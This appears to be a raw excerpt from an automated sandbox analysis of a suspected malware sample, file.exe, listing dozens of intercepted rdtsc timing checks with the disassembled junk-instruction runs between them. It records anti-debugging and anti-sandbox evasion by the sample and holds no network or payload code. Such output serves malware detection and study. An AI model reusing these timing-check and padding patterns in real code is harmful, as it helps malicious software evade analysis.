                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7578A0 second address: 757936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, 7705h 0x00000017 mov edi, 46D47A92h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 sub dword ptr [ebp+122D1AE6h], eax 0x00000029 pushad 0x0000002a jmp 00007FCA94C93E47h 0x0000002f jbe 00007FCA94C93E38h 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D0F15h] 0x0000003c jne 00007FCA94C93E3Ch 0x00000042 push FFFFFFFFh 0x00000044 mov ebx, dword ptr [ebp+122D39B0h] 0x0000004a pushad 0x0000004b ja 00007FCA94C93E38h 0x00000051 mov ecx, ebx 0x00000053 sub al, 00000003h 0x00000056 popad 0x00000057 nop 0x00000058 pushad 0x00000059 push edi 0x0000005a pushad 0x0000005b popad 0x0000005c pop edi 0x0000005d pushad 0x0000005e push edi 0x0000005f pop edi 0x00000060 push edx 0x00000061 pop edx 0x00000062 popad 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jnc 00007FCA94C93E36h 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A61C second address: 75A638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618478h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757936 second address: 75793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D78A second address: 75D791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C94E second address: 75C954 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D791 second address: 75D7F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA9461846Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1D59h], edx 0x00000013 mov ebx, dword ptr [ebp+122D1B00h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d mov di, ax 0x00000020 call 00007FCA94618470h 0x00000025 call 00007FCA94618477h 0x0000002a pop ebx 0x0000002b pop ebx 0x0000002c xchg eax, esi 0x0000002d jnc 00007FCA94618470h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C954 second address: 75C96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D7F6 second address: 75D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D801 second address: 75D805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E8D8 second address: 75E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA94618466h 0x0000000a popad 0x0000000b jnp 00007FCA9461846Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F8EB second address: 75F90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FCA94C93E36h 0x00000014 jmp 00007FCA94C93E3Dh 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA5E second address: 75EA64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766B1D second address: 766B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FCA94C93E36h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766B2A second address: 766B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FCA94618476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E260 second address: 70E2AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94C93E3Dh 0x0000000b jmp 00007FCA94C93E40h 0x00000010 popad 0x00000011 js 00007FCA94C93E62h 0x00000017 push edi 0x00000018 jg 00007FCA94C93E36h 0x0000001e jmp 00007FCA94C93E46h 0x00000023 pop edi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769FFD second address: 76A008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA94618466h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A1B2 second address: 76A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E49h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A1DC second address: 76A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A360 second address: 76A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A4E9 second address: 76A4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A4EF second address: 76A500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007FCA94C93E3Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A500 second address: 76A51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 push edx 0x00000008 jnc 00007FCA94618466h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A51F second address: 76A523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A523 second address: 76A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F3F second address: 771F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F43 second address: 771F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCA9461846Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F60 second address: 771F70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77204D second address: 772052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772052 second address: 772076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA94C93E47h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772076 second address: 772093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCA94618466h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772093 second address: 7720A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720A3 second address: 7720A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720A7 second address: 7720AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720AB second address: 7720D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FCA94618473h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jo 00007FCA94618470h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77582D second address: 77584A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E44h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775FBE second address: 775FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776127 second address: 77612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776391 second address: 776395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776395 second address: 7763AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FCA94C93E38h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE24 second address: 77BE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE33 second address: 77BE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FCA94C93E3Fh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jo 00007FCA94C93E83h 0x00000015 pushad 0x00000016 jc 00007FCA94C93E36h 0x0000001c jno 00007FCA94C93E36h 0x00000022 jmp 00007FCA94C93E3Dh 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FCA94C93E46h 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C5F second address: 705C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C64 second address: 705C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FCA94C93E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C72 second address: 705C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FCA94618466h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEDF second address: 77AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEE7 second address: 77AEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEEB second address: 77AEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEF4 second address: 77AEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEFF second address: 77AF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2DC second address: 77B2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2E2 second address: 77B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2E8 second address: 77B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A987 second address: 77A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B5B7 second address: 77B5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B5BB second address: 77B5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FCA94C93E36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB5B second address: 77BB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB65 second address: 77BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA94C93E36h 0x0000000a jbe 00007FCA94C93E36h 0x00000010 jp 00007FCA94C93E36h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB7F second address: 77BB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA9461846Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78431C second address: 784323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70272C second address: 702730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702730 second address: 702734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702734 second address: 70273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70273A second address: 70274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FCA94C93E36h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70274A second address: 702754 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78318C second address: 783196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783196 second address: 7831A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FCA94618466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7831A6 second address: 7831AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783587 second address: 78358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78358D second address: 7835A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FCA94C93E42h 0x0000000b jo 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783854 second address: 78386B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA9461846Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D6BD second address: 72D6C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7841A2 second address: 7841A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7841A6 second address: 7841B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94C93E3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782BC6 second address: 782BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782BCB second address: 782BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78713A second address: 787154 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618472h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B57F second address: 78B58E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3D2 second address: 78A3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3DA second address: 78A3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459ED second address: 72CB58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and cx, BE19h 0x0000000e call dword ptr [ebp+122D57EEh] 0x00000014 jmp 00007FCA9461846Ch 0x00000019 push esi 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A92 second address: 745A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E24 second address: 745E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA94618476h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E47 second address: 745E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74623D second address: 746252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCA9461846Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7463E3 second address: 746444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FCA94C93E4Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D394Ch] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FCA94C93E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f pushad 0x00000030 add edx, dword ptr [ebp+122D19F9h] 0x00000036 mov di, AD06h 0x0000003a popad 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7467A5 second address: 7467AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7467AA second address: 7467FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FCA94C93E38h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 sub dword ptr [ebp+122D57A7h], ebx 0x0000002c push 0000001Eh 0x0000002e mov edi, esi 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCA94C93E49h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74693F second address: 746943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746943 second address: 746949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
